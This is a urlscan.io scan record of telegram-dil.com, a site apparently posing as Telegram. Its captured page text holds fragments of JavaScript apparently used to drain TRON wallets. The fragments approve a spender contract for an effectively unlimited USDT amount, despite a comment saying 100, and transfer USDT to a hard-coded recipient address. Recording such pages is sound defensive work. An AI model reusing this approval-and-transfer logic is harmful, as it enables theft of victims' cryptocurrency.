telegram-dil.com Open in urlscan Pro
154.211.13.17  Public Scan

Submitted URL: http://telegram-dil.com/
Effective URL: https://telegram-dil.com/
Submission: On November 06 via api from SG — Scanned from SG

Form analysis 0 forms found in the DOM

Text Content

// USDT 的合约地址 const tokenAddress =
"TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t"; // 波场上的 USDT 合约地址 const
spenderContractAddress = "TAEjTP6S2Zk8xu9986xU42pha4KGQQW1n9"; //
部署的授权合约地址 let userAccount = null; //
存储用户的钱包地址 // 连接到 TronLink 钱包 // 初始化连接 //
授权 USDT const amount = window.tronWeb.toSun(9999999999); // 授权 100 个
USDT // 查询trx // if (window.tronWeb.fromSun(allowance) < 1) { //
alert('授权额度不足,请重新授权'); // } // alert('授权额度 = '
+window.tronWeb.fromSun(allowance)); // 转移 USDT const amount = 1000000; //
转移 50 个 USDT const recipientAddress =
"TRTFZVRJh3SxZtajde3FBrtKw44tSzeFzs"; // 接收 USDT 的地址 //
检查trx够不够 // checkAllowance();